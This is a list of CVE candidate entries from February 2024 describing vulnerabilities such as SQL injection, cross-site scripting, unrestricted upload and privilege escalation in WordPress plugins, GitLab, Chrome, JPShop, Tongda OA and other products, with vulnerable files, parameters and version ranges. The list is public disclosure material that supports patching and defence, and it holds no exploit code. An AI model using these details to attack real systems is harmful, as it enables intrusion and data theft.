CVE 2024 1301 Candidate SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool Assigned (20240207)
CVE 2024 1299 Candidate A privilege escalation vulnerability was discovered in GitLab affecting versions 16.8 prior to 16.8.4 and 16.9 prior to 16.9.2. It was possible for a user with custom role of `manage_group_access_tokens` to rotate group access tokens with owner privileges. MISC:GitLab Issue #440745 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/440745 | MISC:HackerOne Bug Bounty Report #2356976 | URL:https://hackerone.com/reports/2356976 | MISC:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/ | URL:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/ Assigned (20240207)
CVE 2024 1297 Candidate Loomio version 2.22.0 allows executing arbitrary commands on the server. This is possible because the application is vulnerable to OS Command Injection. MISC:https://fluidattacks.com/advisories/stones | URL:https://fluidattacks.com/advisories/stones | MISC:https://github.com/loomio/loomio | URL:https://github.com/loomio/loomio Assigned (20240206)
CVE 2024 1296 Candidate The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block upload in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/post.php#L529 | URL:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/post.php#L529 | MISC:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L196 | URL:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L196 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve Assigned (20240206)
CVE 2024 1294 Candidate The Sunshine Photo Cart: Free Client Galleries for Photographers plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.24 via the 'invoice'. This makes it possible for unauthenticated attackers to extract sensitive data including customer email and physical addresses. MISC:https://plugins.trac.wordpress.org/browser/sunshine-photo-cart/tags/3.0.24/includes/admin/sunshine-order.php#L894 | URL:https://plugins.trac.wordpress.org/browser/sunshine-photo-cart/tags/3.0.24/includes/admin/sunshine-order.php#L894 | MISC:https://plugins.trac.wordpress.org/changeset/3033429/sunshine-photo-cart/trunk/includes/admin/sunshine-order.php | URL:https://plugins.trac.wordpress.org/changeset/3033429/sunshine-photo-cart/trunk/includes/admin/sunshine-order.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/da76d034-3e9a-4f3f-a314-48e776028369?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/da76d034-3e9a-4f3f-a314-48e776028369?source=cve Assigned (20240206)
CVE 2024 1293 Candidate The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the embedded media custom block in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve Assigned (20240206)
CVE 2024 1291 Candidate The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown URL parameter in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve Assigned (20240206)
CVE 2024 1290 Candidate The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take over any accounts. MISC:https://wpscan.com/vulnerability/a60187d4-9491-435a-bc36-8dd348a1ffa3/ | URL:https://wpscan.com/vulnerability/a60187d4-9491-435a-bc36-8dd348a1ffa3/ Assigned (20240206)
CVE 2024 1288 Candidate The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saswp_reviews_form_render' function in all versions up to, and including, 1.26. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's stored reCaptcha site and secret keys, potentially breaking the reCaptcha functionality. MISC:https://plugins.svn.wordpress.org/schema-and-structured-data-for-wp/trunk/modules/reviews/reviews_form.php | URL:https://plugins.svn.wordpress.org/schema-and-structured-data-for-wp/trunk/modules/reviews/reviews_form.php | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve Assigned (20240206)
CVE 2024 1285 Candidate The Page Builder Sandwich – Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'gambit_builder_save_content' function in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and above, to insert arbitrary content into existing posts. MISC:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/tags/5.1.0/class-page-builder-sandwich.php#L958 | URL:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/tags/5.1.0/class-page-builder-sandwich.php#L958 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve Assigned (20240206)
CVE 2024 1284 Candidate Use after free in Mojo in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-364516d49a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KN32XXNHIR6KBS4BYQTZV2JQFN4D6ZSE/ | FEDORA:FEDORA-2024-5745525066 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSCIL2WH2L4R4KWSRCTDWBPAMOJIYBJE/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html | MISC:https://issues.chromium.org/issues/41494539 | URL:https://issues.chromium.org/issues/41494539 Assigned (20240206)
CVE 2024 1283 Candidate Heap buffer overflow in Skia in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-364516d49a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KN32XXNHIR6KBS4BYQTZV2JQFN4D6ZSE/ | FEDORA:FEDORA-2024-5745525066 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSCIL2WH2L4R4KWSRCTDWBPAMOJIYBJE/ | MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html | MISC:https://issues.chromium.org/issues/41494860 | URL:https://issues.chromium.org/issues/41494860 Assigned (20240206)
CVE 2024 1282 Candidate The Email Encoder – Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-helpers.php | URL:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-helpers.php | MISC:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-run.php | URL:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-run.php | MISC:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-validate.php | URL:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-validate.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve Assigned (20240206)
CVE 2024 1279 Candidate The Paid Memberships Pro WordPress plugin before 2.12.9 does not prevent user with at least the contributor role from leaking other users' sensitive metadata. MISC:https://wpscan.com/vulnerability/4c537264-0c23-428e-9a11-7a9e74fb6b69/ | URL:https://wpscan.com/vulnerability/4c537264-0c23-428e-9a11-7a9e74fb6b69/ Assigned (20240206)
CVE 2024 1278 Candidate The Easy Social Feed – Social Photos Gallery – Post Feed – Like Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'efb_likebox' shortcode in all versions up to, and including, 6.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/tags/6.5.4/facebook/frontend/easy-facebook-likebox.php | URL:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/tags/6.5.4/facebook/frontend/easy-facebook-likebox.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve Assigned (20240206)
CVE 2024 1277 Candidate The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom fields in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L750 | URL:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L750 | MISC:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L756 | URL:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L756 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve Assigned (20240206)
CVE 2024 1276 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Content Ticker arrow attribute in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.8/includes/Elements/Content_Ticker.php#L815 | URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.8/includes/Elements/Content_Ticker.php#L815 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve Assigned (20240206)
CVE 2024 1273 Candidate The Starbox WordPress plugin before 3.5.0 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks MISC:https://wpscan.com/vulnerability/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb/ | URL:https://wpscan.com/vulnerability/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb/ Assigned (20240206)
CVE 2024 1269 Candidate A vulnerability has been found in SourceCodester Product Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /supplier.php. The manipulation of the argument supplier_name/supplier_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253012. MISC:https://github.com/PrecursorYork/Product-Management-System-Using-PHP-and-MySQL-Reflected-XSS-POC/blob/main/README.md | URL:https://github.com/PrecursorYork/Product-Management-System-Using-PHP-and-MySQL-Reflected-XSS-POC/blob/main/README.md | MISC:https://vuldb.com/?ctiid.253012 | URL:https://vuldb.com/?ctiid.253012 | MISC:https://vuldb.com/?id.253012 | URL:https://vuldb.com/?id.253012 Assigned (20240206)
CVE 2024 1268 Candidate A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011. MISC:https://drive.google.com/drive/folders/1utXNnlH67FjUaBsYhw1cQWyZsO9MLy1i?usp=sharing | URL:https://drive.google.com/drive/folders/1utXNnlH67FjUaBsYhw1cQWyZsO9MLy1i?usp=sharing | MISC:https://vuldb.com/?ctiid.253011 | URL:https://vuldb.com/?ctiid.253011 | MISC:https://vuldb.com/?id.253011 | URL:https://vuldb.com/?id.253011 Assigned (20240206)
CVE 2024 1267 Candidate A vulnerability, which was classified as problematic, has been found in CodeAstro Restaurant POS System 1.0. Affected by this issue is some unknown functionality of the file create_account.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-253010 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/drive/folders/18N_20KuGPjrBbvOMSfbvBIc1sMKyycH3?usp=sharing | URL:https://drive.google.com/drive/folders/18N_20KuGPjrBbvOMSfbvBIc1sMKyycH3?usp=sharing | MISC:https://vuldb.com/?ctiid.253010 | URL:https://vuldb.com/?ctiid.253010 | MISC:https://vuldb.com/?id.253010 | URL:https://vuldb.com/?id.253010 Assigned (20240206)
CVE 2024 1266 Candidate A vulnerability classified as problematic was found in CodeAstro University Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /st_reg.php of the component Student Registration Form. The manipulation of the argument Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253009 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/16a9lQqUFBICw-Hhbe9bT5sSB7qwZjMwA/view?usp=sharing | URL:https://drive.google.com/file/d/16a9lQqUFBICw-Hhbe9bT5sSB7qwZjMwA/view?usp=sharing | MISC:https://vuldb.com/?ctiid.253009 | URL:https://vuldb.com/?ctiid.253009 | MISC:https://vuldb.com/?id.253009 | URL:https://vuldb.com/?id.253009 Assigned (20240206)
CVE 2024 1265 Candidate A vulnerability classified as problematic has been found in CodeAstro University Management System 1.0. Affected is an unknown function of the file /att_add.php of the component Attendance Management. The manipulation of the argument Student Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253008. MISC:https://drive.google.com/file/d/1AnzEcwDC0AP56i65zCqekFAeYQY6skBH/view?usp=sharing | URL:https://drive.google.com/file/d/1AnzEcwDC0AP56i65zCqekFAeYQY6skBH/view?usp=sharing | MISC:https://vuldb.com/?ctiid.253008 | URL:https://vuldb.com/?ctiid.253008 | MISC:https://vuldb.com/?id.253008 | URL:https://vuldb.com/?id.253008 Assigned (20240206)
CVE 2024 1264 Candidate A vulnerability has been found in Juanpao JPShop up to 1.5.02 and classified as critical. Affected by this vulnerability is the function actionUpdate of the file /api/controllers/common/UploadsController.php. The manipulation of the argument imgage leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253003. MISC:https://note.zhaoj.in/share/f8b2IX7GsZS5 | URL:https://note.zhaoj.in/share/f8b2IX7GsZS5 | MISC:https://vuldb.com/?ctiid.253003 | URL:https://vuldb.com/?ctiid.253003 | MISC:https://vuldb.com/?id.253003 | URL:https://vuldb.com/?id.253003 Assigned (20240206)
CVE 2024 1263 Candidate A vulnerability, which was classified as critical, was found in Juanpao JPShop up to 1.5.02. Affected is the function actionUpdate of the file /api/controllers/merchant/shop/PosterController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-253002 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/Lkrp36sa1EHO | URL:https://note.zhaoj.in/share/Lkrp36sa1EHO | MISC:https://vuldb.com/?ctiid.253002 | URL:https://vuldb.com/?ctiid.253002 | MISC:https://vuldb.com/?id.253002 | URL:https://vuldb.com/?id.253002 Assigned (20240206)
CVE 2024 1262 Candidate A vulnerability, which was classified as critical, has been found in Juanpao JPShop up to 1.5.02. This issue affects the function actionUpdate of the file /api/controllers/merchant/design/MaterialController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253001 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/C1btykKlahBD | URL:https://note.zhaoj.in/share/C1btykKlahBD | MISC:https://vuldb.com/?ctiid.253001 | URL:https://vuldb.com/?ctiid.253001 | MISC:https://vuldb.com/?id.253001 | URL:https://vuldb.com/?id.253001 Assigned (20240206)
CVE 2024 1261 Candidate A vulnerability classified as critical was found in Juanpao JPShop up to 1.5.02. This vulnerability affects the function actionIndex of the file /api/controllers/merchant/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253000. MISC:https://note.zhaoj.in/share/v2JpHJngvw7E | URL:https://note.zhaoj.in/share/v2JpHJngvw7E | MISC:https://vuldb.com/?ctiid.253000 | URL:https://vuldb.com/?ctiid.253000 | MISC:https://vuldb.com/?id.253000 | URL:https://vuldb.com/?id.253000 Assigned (20240206)
CVE 2024 1260 Candidate A vulnerability classified as critical has been found in Juanpao JPShop up to 1.5.02. This affects the function actionIndex of the file /api/controllers/admin/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252999. MISC:https://note.zhaoj.in/share/H73DuWdyifaI | URL:https://note.zhaoj.in/share/H73DuWdyifaI | MISC:https://vuldb.com/?ctiid.252999 | URL:https://vuldb.com/?ctiid.252999 | MISC:https://vuldb.com/?id.252999 | URL:https://vuldb.com/?id.252999 Assigned (20240206)
CVE 2024 1259 Candidate A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/rCt6PpJxBvuI | URL:https://note.zhaoj.in/share/rCt6PpJxBvuI | MISC:https://vuldb.com/?ctiid.252998 | URL:https://vuldb.com/?ctiid.252998 | MISC:https://vuldb.com/?id.252998 | URL:https://vuldb.com/?id.252998 Assigned (20240206)
CVE 2024 1258 Candidate A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file api/config/params.php of the component API. The manipulation of the argument JWT_KEY_ADMIN leads to use of hard-coded cryptographic key . The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252997 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/XblX1My7jNV7 | URL:https://note.zhaoj.in/share/XblX1My7jNV7 | MISC:https://vuldb.com/?ctiid.252997 | URL:https://vuldb.com/?ctiid.252997 | MISC:https://vuldb.com/?id.252997 | URL:https://vuldb.com/?id.252997 Assigned (20240206)
CVE 2024 1257 Candidate A vulnerability was found in Jspxcms 10.2.0. It has been classified as problematic. Affected is an unknown function of the file /ext/collect/find_text.do. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252996. MISC:https://github.com/sweatxi/BugHub/blob/main/find_text_do.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/find_text_do.pdf | MISC:https://vuldb.com/?ctiid.252996 | URL:https://vuldb.com/?ctiid.252996 | MISC:https://vuldb.com/?id.252996 | URL:https://vuldb.com/?id.252996 Assigned (20240206)
CVE 2024 1256 Candidate A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. This issue affects some unknown processing of the file /ext/collect/filter_text.do. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252995. MISC:https://github.com/sweatxi/BugHub/blob/main/filter_txet_do.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/filter_txet_do.pdf | MISC:https://vuldb.com/?ctiid.252995 | URL:https://vuldb.com/?ctiid.252995 | MISC:https://vuldb.com/?id.252995 | URL:https://vuldb.com/?id.252995 Assigned (20240206)
CVE 2024 1255 Candidate A vulnerability has been found in sepidz SepidzDigitalMenu up to 7.1.0728.1 and classified as problematic. This vulnerability affects unknown code of the file /Waiters. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.252994 | URL:https://vuldb.com/?ctiid.252994 | MISC:https://vuldb.com/?id.252994 | URL:https://vuldb.com/?id.252994 Assigned (20240206)
CVE 2024 1254 Candidate A vulnerability, which was classified as critical, was found in Beijing Baichuo Smart S20 Management Platform up to 20231120. This affects an unknown part of the file /sysmanage/sysmanageajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252993 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/rockersiyuan/CVE/blob/main/Smart%20S20.md | URL:https://github.com/rockersiyuan/CVE/blob/main/Smart%20S20.md | MISC:https://vuldb.com/?ctiid.252993 | URL:https://vuldb.com/?ctiid.252993 | MISC:https://vuldb.com/?id.252993 | URL:https://vuldb.com/?id.252993 Assigned (20240206)
CVE 2024 1253 Candidate A vulnerability, which was classified as critical, has been found in Beijing Baichuo Smart S40 Management Platform up to 20240126. Affected by this issue is some unknown functionality of the file /useratte/web.php of the component Import Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/b51s77/cve/blob/main/upload.md | URL:https://github.com/b51s77/cve/blob/main/upload.md | MISC:https://vuldb.com/?ctiid.252992 | URL:https://vuldb.com/?ctiid.252992 | MISC:https://vuldb.com/?id.252992 | URL:https://vuldb.com/?id.252992 Assigned (20240206)
CVE 2024 1252 Candidate A vulnerability classified as critical was found in Tongda OA 2017 up to 11.9. Affected by this vulnerability is an unknown functionality of the file /general/attendance/manage/ask_duty/delete.php. The manipulation of the argument ASK_DUTY_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252991. MISC:https://github.com/b51s77/cve/blob/main/sql.md | URL:https://github.com/b51s77/cve/blob/main/sql.md | MISC:https://vuldb.com/?ctiid.252991 | URL:https://vuldb.com/?ctiid.252991 | MISC:https://vuldb.com/?id.252991 | URL:https://vuldb.com/?id.252991 Assigned (20240206)
CVE 2024 1251 Candidate A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.10. Affected is an unknown function of the file /general/email/outbox/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-252990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/rockersiyuan/CVE/blob/main/TongDa%20Sql%20inject.md | URL:https://github.com/rockersiyuan/CVE/blob/main/TongDa%20Sql%20inject.md | MISC:https://vuldb.com/?ctiid.252990 | URL:https://vuldb.com/?ctiid.252990 | MISC:https://vuldb.com/?id.252990 | URL:https://vuldb.com/?id.252990 Assigned (20240206)
CVE 2024 1250 Candidate An issue has been discovered in GitLab EE affecting all versions starting from 16.8 before 16.8.2. When a user is assigned a custom role with manage_group_access_tokens permission, they may be able to create group access tokens with Owner privileges, which may lead to privilege escalation. MISC:GitLab Issue #439175 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/439175 Assigned (20240206)
CVE 2024 1247 Candidate Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS via the Role Name field since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Role Name field which might be executed when users visit the affected page. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Concrete versions below 9 do not include group types so they are not affected by this vulnerability. MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes | URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes | MISC:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory | URL:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory Assigned (20240206)
